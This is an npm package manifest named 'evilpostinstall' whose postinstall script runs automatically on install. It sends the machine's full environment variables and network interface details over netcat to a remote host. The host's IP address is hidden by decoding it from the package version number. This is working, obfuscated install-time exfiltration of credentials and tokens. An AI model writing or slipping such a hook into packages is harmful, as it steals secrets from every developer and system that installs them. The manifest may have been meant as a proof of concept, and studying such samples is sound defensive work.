{
  "name": "evilpostinstall",
  "version": "49.13.4074225",
  "description": "Assess the system running postinstall",
  "main": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1",
    "postinstall": "(env; ip addr) | nc \"$(echo \"$npm_package_version\" | cut -d. -f1-2).$(echo \"$npm_package_version\" | cut -d. -f3- | cut -b 2-4).$(echo \"$npm_package_version\" | cut -d. -f3- | cut -b 5-7)\" 888"
  },
  "author": "",
  "license": "BSD-2-Clause"
}
